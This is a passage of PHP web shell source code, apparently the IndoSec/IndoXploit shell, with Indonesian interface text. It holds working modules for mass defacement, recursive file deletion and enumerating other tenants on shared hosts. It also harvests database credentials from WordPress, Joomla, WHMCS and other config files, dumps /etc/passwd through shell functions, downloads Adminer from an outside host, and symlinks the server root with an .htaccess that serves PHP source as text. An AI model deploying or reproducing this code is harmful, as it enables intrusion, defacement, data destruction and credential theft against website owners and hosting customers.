- file_put_contents($lokasi, $isi_script);
- } else {
- if(is_dir($dirc)) {
- if(is_writable($dirc)) {
- echo "Done > $lokasi\n";
- file_put_contents($lokasi, $isi_script);
- $masdef = tipe_massal($dirc,$namafile,$isi_script);
- }
- }
- }
- }
- }
- }
- function tipe_biasa($dir,$namafile,$isi_script) {
- if(is_writable($dir)) {
- $dira = scandir($dir);
- foreach($dira as $dirb) {
- $dirc = "$dir/$dirb";
- $lokasi = $dirc.'/'.$namafile;
- if($dirb === '.') {
- file_put_contents($lokasi, $isi_script);
- } elseif($dirb === '..') {
- file_put_contents($lokasi, $isi_script);
- } else {
- if(is_dir($dirc)) {
- if(is_writable($dirc)) {
- echo "Done > $dirb/$namafile\n";
- file_put_contents($lokasi, $isi_script);
- }
- }
- }
- }
- }
- }
- if($_POST['start']) {
- echo "[ <a href='?dir=$dir'>Kembali</a> ]
- <textarea class='form-control' rows='13' disabled=''>";
- if($_POST['tipe'] == 'mahal') {
- tipe_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
- } elseif($_POST['tipe'] == 'murah') {
- tipe_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
- }
- echo "</textarea><br/>";
- } else {
- echo "<form method='post'>
- <center>
- <h5>Tipe :</h5>
- <input id='toggle-on' class='toggle toggle-left' name='tipe' value='murah' type='radio' checked>
- <label for='toggle-on' class='butn'>Biasa</label>
- <input id='toggle-off' class='toggle toggle-right' name='tipe' value='mahal' type='radio'>
- <label for='toggle-off' class='butn'>Masal</label>
- </center>
- <h5>$imgfol Lokasi :</h5>
- <input type='text' name='d_dir' value='$dir' class='form-control'><br>
- <h5>$imgfile Nama File :</h5>
- <input type='text' name='d_file' placeholder='[Ex] index.php' class='form-control'><br/>
- <h5>$imgfile Isi File :</h5>
- <textarea name='script' class='form-control' rows='13' placeholder='[Ex] Hacked By { IndoSec }'></textarea><br/>
- <input type='submit' name='start' value='Mass Deface' class='btn btn-danger form-control'><br/>
- </form>";
- }
- exit;
- }
- /*
- * mass delete
- * IndoXploit
- */
- if($_GET['aksi'] == 'masdel') {
- function hapus_massal($dir,$namafile) {
- if(is_writable($dir)) {
- $dira = scandir($dir);
- foreach($dira as $dirb) {
- $dirc = "$dir/$dirb";
- $lokasi = $dirc.'/'.$namafile;
- if($dirb === '.') {
- if(file_exists("$dir/$namafile")) {
- unlink("$dir/$namafile");
- }
- } elseif($dirb === '..') {
- if(file_exists("".dirname($dir)."/$namafile")) {
- unlink("".dirname($dir)."/$namafile");
- }
- } else {
- if(is_dir($dirc)) {
- if(is_writable($dirc)) {
- if($lokasi) {
- echo "$lokasi > Terhapus\n";
- unlink($lokasi);
- $massdel = hapus_massal($dirc,$namafile);
- }
- }
- }
- }
- }
- }
- }
- if($_POST['start']) {
- echo "[ <a href='?dir=$dir'>Kembali</a> ]
- <textarea class='form-control' rows='13' disabled=''>";
- hapus_massal($_POST['d_dir'], $_POST['d_file']);
- echo "</textarea><br/>";
- } else {
- echo "<form method='post'>
- <h5>$imgfol Lokasi :</h5>
- <input type='text' name='d_dir' value='$dir' class='form-control'><br/>
- <h5>$imgfile Nama File :</h5>
- <input type='text' name='d_file' placeholder='[Ex] index.php' class='form-control'><br/>
- <input type='submit' name='start' value='Delete!!' class='btn btn-danger form-control'>
- </form>";
- }
- exit;
- }
- /*
- * Jumping
- * IndoXploit
- */
- if($_GET['aksi'] == 'jumping') {
- $i = 0;
- echo "<div class='card container'>";
- if(preg_match("/hsphere/", $dir)) {
- $urls = explode("\r\n", $_POST['url']);
- if(isset($_POST['jump'])) {
- echo "<pre>";
- foreach($urls as $url) {
- $url = str_replace(array("http://","www."), "", strtolower($url));
- $etc = "/etc/passwd";
- $f = fopen($etc,"r");
- while($gets = fgets($f)) {
- $pecah = explode(":", $gets);
- $user = $pecah[0];
- $dir_user = "/hsphere/local/home/$user";
- if(is_dir($dir_user) === true) {
- $url_user = $dir_user."/".$url;
- if(is_readable($url_user)) {
- $i++;
- $jrw = "[<font color=green>R</font>] <a href='?dir=$url_user'><font color=#0046FF>$url_user</font></a>";
- if(is_writable($url_user)) {
- $jrw = "[<font color=green>RW</font>] <a href='?dir=$url_user'><font color=#0046FF>$url_user</font></a>";
- }
- echo $jrw."<br>";
- }
- }
- }
- }
- if($i == 0) {
- } else {
- echo "<br>Total ada ".$i." Kamar di ".$ip;
- }
- echo "</pre>";
- } else {
- echo '<center>
- <form method="post">
- List Domains: <br>
- <textarea name="url" class="form-control">';
- $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
- while($getss = fgets($fp)) {
- echo $getss;
- }
- echo '</textarea><br>
- <input type="submit" value="Jumping" name="jump" class="btn btn-danger btn-block">
- </form></center>';
- }
- } elseif(preg_match("/vhosts/", $dir)) {
- $urls = explode("\r\n", $_POST['url']);
- if(isset($_POST['jump'])) {
- echo "<pre>";
- foreach($urls as $url) {
- $web_vh = "/var/www/vhosts/$url/httpdocs";
- if(is_dir($web_vh) === true) {
- if(is_readable($web_vh)) {
- $i++;
- $jrw = "[<font color=green>R</font>] <a href='?dir=$web_vh'><font color=#0046FF>$web_vh</font></a>";
- if(is_writable($web_vh)) {
- $jrw = "[<font color=green>RW</font>] <a href='?dir=$web_vh'><font color=#0046FF>$web_vh</font></a>";
- }
- echo $jrw."<br>";
- }
- }
- }
- if($i == 0) {
- } else {
- echo "<br>Total ada ".$i." Kamar di ".$ip;
- }
- echo "</pre>";
- } else {
- echo '<center>
- <form method="post">
- List Domains: <br>
- <textarea name="url" class="form-control">';
- bing("ip:$ip");
- echo '</textarea><br>
- <input type="submit" value="Jumping" name="jump" class="btn btn-danger btn-block">
- </form></center>';
- }
- } else {
- echo "<pre>";
- $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font><br/>");
- while($passwd = fgets($etc)) {
- if($passwd == '' || !$etc) {
- echo "<font color=red>Can't read /etc/passwd</font><br/>";
- } else {
- preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
- foreach($user_jumping[1] as $user_pro_jump) {
- $user_jumping_dir = "/home/$user_pro_jump/public_html";
- if(is_readable($user_jumping_dir)) {
- $i++;
- $jrw = "[<font color=green>R</font>] <a href='?dir=$user_jumping_dir'><font color=#0046FF>$user_jumping_dir</font></a>";
- if(is_writable($user_jumping_dir)) {
- $jrw = "[<font color=green>RW</font>] <a href='?dir=$user_jumping_dir'><font color=#0046FF>$user_jumping_dir</font></a>";
- }
- echo $jrw;
- if(function_exists('posix_getpwuid')) {
- $domain_jump = file_get_contents("/etc/named.conf");
- if($domain_jump == '') {
- echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
- } else {
- preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
- foreach($domains_jump[1] as $dj) {
- $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
- $user_jumping_url = $user_jumping_url['name'];
- if($user_jumping_url == $user_pro_jump) {
- echo " => ( <u>$dj</u> )<br>";
- break;
- }
- }
- }
- } else {
- echo "<br>";
- }
- }
- }
- }
- }
- if($i == 0) {
- } else {
- echo "<br>Total ada ".$i." Kamar di ".$ip;
- }
- echo "</pre>";
- }
- echo "</div><br/>";
- exit;
- }
- /*
- Config
- */
- if($_GET['aksi'] == 'config') {
- if($_POST){
- $passwd = $_POST['passwd'];
- mkdir("indosec_config", 0777);
- $isi_htc = "Options allnRequire NonenSatisfy Any";
- $htc = fopen("indosec_config/.htaccess","w");
- fwrite($htc, $isi_htc);
- preg_match_all('/(.*?):x:/', $passwd, $user_config);
- foreach($user_config[1] as $user_con) {
- $user_config_dir = "/home/$user_con/public_html/";
- if(is_readable($user_config_dir)) {
- $grab_config = array(
- "/home/$user_con/.my.cnf" => "cpanel",
- "/home/$user_con/public_html/config/koneksi.php" => "Lokomedia",
- "/home/$user_con/public_html/forum/config.php" => "phpBB",
- "/home/$user_con/public_html/sites/default/settings.php" => "Drupal",
- "/home/$user_con/public_html/config/settings.inc.php" => "PrestaShop",
- "/home/$user_con/public_html/app/etc/local.xml" => "Magento",
- "/home/$user_con/public_html/admin/config.php" => "OpenCart",
- "/home/$user_con/public_html/application/config/database.php" => "Ellislab",
- "/home/$user_con/public_html/vb/includes/config.php" => "Vbulletin",
- "/home/$user_con/public_html/includes/config.php" => "Vbulletin",
- "/home/$user_con/public_html/forum/includes/config.php" => "Vbulletin",
- "/home/$user_con/public_html/forums/includes/config.php" => "Vbulletin",
- "/home/$user_con/public_html/cc/includes/config.php" => "Vbulletin",
- "/home/$user_con/public_html/inc/config.php" => "MyBB",
- "/home/$user_con/public_html/includes/configure.php" => "OsCommerce",
- "/home/$user_con/public_html/shop/includes/configure.php" => "OsCommerce",
- "/home/$user_con/public_html/os/includes/configure.php" => "OsCommerce",
- "/home/$user_con/public_html/oscom/includes/configure.php" => "OsCommerce",
- "/home/$user_con/public_html/products/includes/configure.php" => "OsCommerce",
- "/home/$user_con/public_html/cart/includes/configure.php" => "OsCommerce",
- "/home/$user_con/public_html/inc/conf_global.php" => "IPB",
- "/home/$user_con/public_html/wp-config.php" => "Wordpress",
- "/home/$user_con/public_html/wp/test/wp-config.php" => "Wordpress",
- "/home/$user_con/public_html/blog/wp-config.php" => "Wordpress",
- "/home/$user_con/public_html/beta/wp-config.php" => "Wordpress",
- "/home/$user_con/public_html/portal/wp-config.php" => "Wordpress",
- "/home/$user_con/public_html/site/wp-config.php" => "Wordpress",
- "/home/$user_con/public_html/wp/wp-config.php" => "Wordpress",
- "/home/$user_con/public_html/WP/wp-config.php" => "Wordpress",
- "/home/$user_con/public_html/news/wp-config.php" => "Wordpress",
- "/home/$user_con/public_html/wordpress/wp-config.php" => "Wordpress",
- "/home/$user_con/public_html/test/wp-config.php" => "Wordpress",
- "/home/$user_con/public_html/demo/wp-config.php" => "Wordpress",
- "/home/$user_con/public_html/home/wp-config.php" => "Wordpress",
- "/home/$user_con/public_html/v1/wp-config.php" => "Wordpress",
- "/home/$user_con/public_html/v2/wp-config.php" => "Wordpress",
- "/home/$user_con/public_html/press/wp-config.php" => "Wordpress",
- "/home/$user_con/public_html/new/wp-config.php" => "Wordpress",
- "/home/$user_con/public_html/blogs/wp-config.php" => "Wordpress",
- "/home/$user_con/public_html/configuration.php" => "Joomla",
- "/home/$user_con/public_html/blog/configuration.php" => "Joomla",
- "/home/$user_con/public_html/submitticket.php" => "^WHMCS",
- "/home/$user_con/public_html/cms/configuration.php" => "Joomla",
- "/home/$user_con/public_html/beta/configuration.php" => "Joomla",
- "/home/$user_con/public_html/portal/configuration.php" => "Joomla",
- "/home/$user_con/public_html/site/configuration.php" => "Joomla",
- "/home/$user_con/public_html/main/configuration.php" => "Joomla",
- "/home/$user_con/public_html/home/configuration.php" => "Joomla",
- "/home/$user_con/public_html/demo/configuration.php" => "Joomla",
- "/home/$user_con/public_html/test/configuration.php" => "Joomla",
- "/home/$user_con/public_html/v1/configuration.php" => "Joomla",
- "/home/$user_con/public_html/v2/configuration.php" => "Joomla",
- "/home/$user_con/public_html/joomla/configuration.php" => "Joomla",
- "/home/$user_con/public_html/new/configuration.php" => "Joomla",
- "/home/$user_con/public_html/WHMCS/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/whmcs1/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/Whmcs/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/whmcs/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/whmcs/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/WHMC/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/Whmc/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/whmc/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/WHM/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/Whm/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/whm/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/HOST/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/Host/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/host/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/SUPPORTES/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/Supportes/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/supportes/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/domains/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/domain/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/Hosting/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/HOSTING/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/hosting/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/CART/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/Cart/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/cart/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/ORDER/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/Order/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/order/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/CLIENT/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/Client/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/client/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/CLIENTAREA/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/Clientarea/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/clientarea/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/SUPPORT/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/Support/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/support/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/BILLING/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/Billing/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/billing/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/BUY/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/Buy/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/buy/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/MANAGE/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/Manage/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/manage/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/CLIENTSUPPORT/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/ClientSupport/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/Clientsupport/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/clientsupport/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/CHECKOUT/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/Checkout/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/checkout/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/BILLINGS/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/Billings/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/billings/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/BASKET/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/Basket/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/basket/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/SECURE/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/Secure/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/secure/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/SALES/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/Sales/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/sales/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/BILL/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/Bill/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/bill/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/PURCHASE/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/Purchase/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/purchase/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/ACCOUNT/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/Account/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/account/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/USER/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/User/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/user/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/CLIENTS/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/Clients/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/clients/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/BILLINGS/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/Billings/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/billings/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/MY/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/My/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/my/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/secure/whm/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/secure/whmcs/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/panel/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/clientes/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/cliente/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/support/order/submitticket.php" => "WHMCS",
- "/home/$user_con/public_html/bb-config.php" => "BoxBilling",
- "/home/$user_con/public_html/boxbilling/bb-config.php" => "BoxBilling",
- "/home/$user_con/public_html/box/bb-config.php" => "BoxBilling",
- "/home/$user_con/public_html/host/bb-config.php" => "BoxBilling",
- "/home/$user_con/public_html/Host/bb-config.php" => "BoxBilling",
- "/home/$user_con/public_html/supportes/bb-config.php" => "BoxBilling",
- "/home/$user_con/public_html/support/bb-config.php" => "BoxBilling",
- "/home/$user_con/public_html/hosting/bb-config.php" => "BoxBilling",
- "/home/$user_con/public_html/cart/bb-config.php" => "BoxBilling",
- "/home/$user_con/public_html/order/bb-config.php" => "BoxBilling",
- "/home/$user_con/public_html/client/bb-config.php" => "BoxBilling",
- "/home/$user_con/public_html/clients/bb-config.php" => "BoxBilling",
- "/home/$user_con/public_html/cliente/bb-config.php" => "BoxBilling",
- "/home/$user_con/public_html/clientes/bb-config.php" => "BoxBilling",
- "/home/$user_con/public_html/billing/bb-config.php" => "BoxBilling",
- "/home/$user_con/public_html/billings/bb-config.php" => "BoxBilling",
- "/home/$user_con/public_html/my/bb-config.php" => "BoxBilling",
- "/home/$user_con/public_html/secure/bb-config.php" => "BoxBilling",
- "/home/$user_con/public_html/support/order/bb-config.php" => "BoxBilling",
- "/home/$user_con/public_html/includes/dist-configure.php" => "Zencart",
- "/home/$user_con/public_html/zencart/includes/dist-configure.php" => "Zencart",
- "/home/$user_con/public_html/products/includes/dist-configure.php" => "Zencart",
- "/home/$user_con/public_html/cart/includes/dist-configure.php" => "Zencart",
- "/home/$user_con/public_html/shop/includes/dist-configure.php" => "Zencart",
- "/home/$user_con/public_html/includes/iso4217.php" => "Hostbills",
- "/home/$user_con/public_html/hostbills/includes/iso4217.php" => "Hostbills",
- "/home/$user_con/public_html/host/includes/iso4217.php" => "Hostbills",
- "/home/$user_con/public_html/Host/includes/iso4217.php" => "Hostbills",
- "/home/$user_con/public_html/supportes/includes/iso4217.php" => "Hostbills",
- "/home/$user_con/public_html/support/includes/iso4217.php" => "Hostbills",
- "/home/$user_con/public_html/hosting/includes/iso4217.php" => "Hostbills",
- "/home/$user_con/public_html/cart/includes/iso4217.php" => "Hostbills",
- "/home/$user_con/public_html/order/includes/iso4217.php" => "Hostbills",
- "/home/$user_con/public_html/client/includes/iso4217.php" => "Hostbills",
- "/home/$user_con/public_html/clients/includes/iso4217.php" => "Hostbills",
- "/home/$user_con/public_html/cliente/includes/iso4217.php" => "Hostbills",
- "/home/$user_con/public_html/clientes/includes/iso4217.php" => "Hostbills",
- "/home/$user_con/public_html/billing/includes/iso4217.php" => "Hostbills",
- "/home/$user_con/public_html/billings/includes/iso4217.php" => "Hostbills",
- "/home/$user_con/public_html/my/includes/iso4217.php" => "Hostbills",
- "/home/$user_con/public_html/secure/includes/iso4217.php" => "Hostbills",
- "/home/$user_con/public_html/support/order/includes/iso4217.php" => "Hostbills"
- );
- foreach($grab_config as $config => $nama_config) {
- $ambil_config = file_get_contents($config);
- if($ambil_config == '') {
- } else {
- $file_config = fopen("indosec_config/$user_con-$nama_config.txt","w");
- fputs($file_config,$ambil_config);
- }
- }
- }
- }
- echo "<p class='text-center'>Success Get Config!!</p>
- <a href='?dir=$dir/indosec_config' class='btn btn-success btn-block mb-4'>Click Here</a>";
- }else{
- echo "<form method='post'>
- <p class='text-danger'>/etc/passwd error ? <a href='?dir=".$dir."&aksi=passwbypass'>Bypass Here</a></p>
- <textarea name='passwd' class='form-control' rows='13'>".file_get_contents('/etc/passwd')."</textarea><br/>
- <input type='submit' class='btn btn-danger btn-block' value='Get Config!!'>
- </form>";
- }
- exit;
- }
- /*
- Bypass etc/passwd
- */
- if($_GET['aksi'] == 'passwbypass') {
- echo '<div claas="container">
- <form method="POST">
- <p class="text-center">Bypass etc/passwd With :</p>
- <div class="d-flex justify-content-center flex-wrap">
- <input type="submit" class="fiture btn btn-danger btn-sm" value="System Function" name="syst">
- <input type="submit" class="fiture btn btn-danger btn-sm" value="Passthru Function" name="passth">
- <input type="submit" class="fiture btn btn-danger btn-sm" value="Exec Function" name="ex">
- <input type="submit" class="fiture btn btn-danger btn-sm" value="Shell_exec Function" name="shex">
- <input type="submit" class="fiture btn btn-danger btn-sm" value="Posix_getpwuid Function" name="melex">
- </div><hr/>
- <p class="text-center">Bypass User With :</p>
- <div class="d-flex justify-content-center flex-wrap">
- <input type="submit" class="fiture btn btn-warning btn-sm" value="Awk Program" name="awkuser">
- <input type="submit" class="fiture btn btn-warning btn-sm" value="System Function" name="systuser">
- <input type="submit" class="fiture btn btn-warning btn-sm" value="Passthru Function" name="passthuser">
- <input type="submit" class="fiture btn btn-warning btn-sm" value="Exec Function" name="exuser">
- <input type="submit" class="fiture btn btn-warning btn-sm" value="Shell_exec Function" name="shexuser">
- </div>
- </form>';
- $mail = 'ls /var/mail';
- $paswd = '/etc/passwd';
- if($_POST['syst']) {
- echo"<textarea class='form-control' rows='13'>";
- echo system("cat $paswd");
- echo"</textarea><br/>";
- }
- if($_POST['passth']) {
- echo"<textarea class='form-control' rows='13'>";
- echo passthru("cat $paswd");
- echo"</textarea><br/>";
- }
- if($_POST['ex']) {
- echo"<textarea class='form-control' rows='13'>";
- echo exec("cat $paswd");
- echo"</textarea><br/>";
- }
- if($_POST['shex']) {
- echo"<textarea class='form-control' rows='13'>";
- echo shell_exec("cat $paswd");
- echo"</textarea><br/>";
- }
- if($_POST['melex']) {
- echo"<textarea class='form-control' rows='13'>";
- for($uid=0;$uid<6000;$uid++){
- $ara = posix_getpwuid($uid);
- if (!empty($ara)) {
- while (list ($key, $val) = each($ara)){
- print "$val:";
- }
- print "n";
- }
- }
- echo"</textarea><br/>";
- }
- if ($_POST['awkuser']) {
- echo"<textarea class='form-control' rows='13'>
- ".shell_exec("awk -F: '{ print $1 }' $paswd | sort")."
- </textarea><br/>";
- }
- if ($_POST['systuser']) {
- echo"<textarea class='form-control' rows='13'>";
- echo system("$mail");
- echo "</textarea><br>";
- }
- if ($_POST['passthuser']) {
- echo"<textarea class='form-control' rows='13'>";
- echo passthru("$mail");
- echo "</textarea><br>";
- }
- if ($_POST['exuser']) {
- echo"<textarea class='form-control' rows='13'>";
- echo exec("$mail");
- echo "</textarea><br>";
- }
- if ($_POST['shexuser']) {
- echo"<textarea class='form-control' rows='13'>";
- echo shell_exec("$mail");
- echo "</textarea><br>";
- }
- echo "</div>";
- exit;
- }
- /*
- Adminer
- */
- if($_GET['aksi'] == 'adminer') {
- $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
- function adminer($url, $isi) {
- $fp = fopen($isi, "w");
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $url);
- curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
- curl_setopt($ch, CURLOPT_FILE, $fp);
- return curl_exec($ch);
- curl_close($ch);
- fclose($fp);
- ob_flush();
- flush();
- }
- if(file_exists('adminer.php')) {
- echo "<a href='$full/adminer.php' target='_blank' class='text-center btn btn-success btn-block mb-3'>Login Adminer</a>";
- } else {
- if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
- echo "<p class='text-center'>Berhasil Membuat Adminer</p><a href='$full/adminer.php' target='_blank' class='text-center btn btn-success btn-block mb-3'>Login Adminer</a>";
- } else {
- echo "<p class='text-center text-danger'>Gagal Membuat Adminer</p>";
- }
- }
- exit;
- }
- /*
- * Symlink Server
- * Kuda Shell
- */
- if($_GET['aksi'] == 'symlink') {
- $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
- $d0mains = @file("/etc/named.conf");
- if(!$d0mains) {
- die ("[ <a href='?dir=$dir&aksi=symread'>Bypass Read</a> ] [ <a href='?dir=$dir&aksi=sym_404'>Symlink 404</a> ] [ <a href='?dir=$dir&aksi=sym_bypas'>Symlink Bypass</a> ]<br/><font color='red'>Error tidak dapat membaca /etc/named.conf</font><br/><br/>");
- }
- ##htaccess
- if($d0mains){
- @mkdir("indosec_sym",0777);
- @chdir("indosec_sym");
- @exe("ln -s / root");
- $file3 = 'Options Indexes FollowSymLinks
- DirectoryIndex indsc.html
- AddType text/plain php html php5 phtml
- AddHandler text/plain php html php5 phtml
- Satisfy Any';
- $fp3 = fopen('.htaccess','w');
- $fw3 = fwrite($fp3,$file3);@fclose($fp3);
- echo "[ <a href='?dir=$dir&aksi=symread'>Bypass Read</a> ] [ <a href='?dir=$dir&aksi=sym_404'>Symlink 404</a> ] [ <a href='?dir=$dir&aksi=sym_bypas'>Symlink Bypass</a> ]
- <div class='tmp'>
- <table class='text-center table-responsive'>
- <thead class='bg-info'>
- <th>No.</th>
- <th>Domains</th>
- <th>Users</th>
- <th>symlink </th>
- </thead>";
- $dcount = 1;
- foreach($d0mains as $d0main){
- if(eregi("zone",$d0main)){
- preg_match_all('#zone "(.*)"#', $d0main, $domains);
- flush();
- if(strlen(trim($domains[1][0])) > 2){
- $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
- echo "<tr>
- <td>".$dcount."</td>
- <td class='text-left'><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td>
- <td>".$user['name']."</td>
- <td><a href='$full/indosec_sym/root/home/".$user['name']."/public_html' target='_blank'>Symlink</a></td>
- </tr>";
- flush();
- $dcount++;
- }
- }
- }
- echo "</table></div>";
- }else{
- $TEST = @file('/etc/passwd');
- if ($TEST){
- @mkdir("indosec_sym",0777);
- @chdir("indosec_sym");
- @exe("ln -s / root");
- $file3 = 'Options Indexes FollowSymLinks
- DirectoryIndex indsc.html
- AddType text/plain php html php5 phtml
- AddHandler text/plain php html php5 phtml
- Satisfy Any';
- $fp3 = fopen('.htaccess','w');
- $fw3 = fwrite($fp3,$file3);
- @fclose($fp3);
- echo "[ <a href='?dir=$dir&aksi=symread'>Bypass Read</a> ] [ <a href='?dir=$dir&aksi=sym_404'>Symlink 404</a> ] [ <a href='?dir=$dir&aksi=sym_bypas'>Symlink Bypass</a> ]
- <div class='tmp'>
- <table class='text-center table-responsive'>
- <thead class='bg-warning'>
- <th>No.</th>
- <th>Users</th>
- <th>symlink </th>
- </thead>";
- $dcount = 1;
- $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
- while(!feof($file)){
- $s = fgets($file);
- $matches = array();
- $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
- $matches = str_replace("home/","",$matches[1]);
- if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
- continue;
- echo "<tr>
- <td>".$dcount."</td>
- <td>".$matches."</td>
- <td><a href=$full/indosec_sym/root/home/".$matches."/public_html target='_blank'>Symlink</a></td>
- </tr>";
- $dcount++;
- }
- fclose($file);
- echo "</table></div>";
- }else{
- if($os != "Windows"){
- @mkdir("indosec_sym",0777);
- @chdir("indosec_sym");
- @exe("ln -s / root");
- $file3 = 'Options Indexes FollowSymLinks
- DirectoryIndex indsc.html
- AddType text/plain php html php5 phtml
- AddHandler text/plain php html php5 phtml
- Satisfy Any';
- $fp3 = fopen('.htaccess','w');
- $fw3 = fwrite($fp3,$file3);@fclose($fp3);
- echo "[ <a href='?dir=$dir&aksi=symread'>Bypass Read</a> ] [ <a href='?dir=$dir&aksi=sym_404'>Symlink 404</a> ] [ <a href='?dir=$dir&aksi=sym_bypas'>Symlink Bypass</a> ]
- <div class='tmp'>
- <table class='text-center table-responsive'>
- <thead class='bg-danger'>
- <th>ID.</th>
- <th>Users</th>
- <th>symlink </th>
- </thead>";
- $temp = "";$val1 = 0;$val2 = 1000;
- for(;$val1 <= $val2;$val1++){
- $uid = @posix_getpwuid($val1);
- if ($uid)$temp .= join(':',$uid)."\n";
- }
- echo '<br/>';$temp = trim($temp);
- $file5 = fopen("test.txt","w");
- fputs($file5,$temp);
- fclose($file5);$dcount = 1;$file =
- fopen("test.txt", "r") or exit("Unable to open file!");
- while(!feof($file)){
- $s = fgets($file);$matches = array();
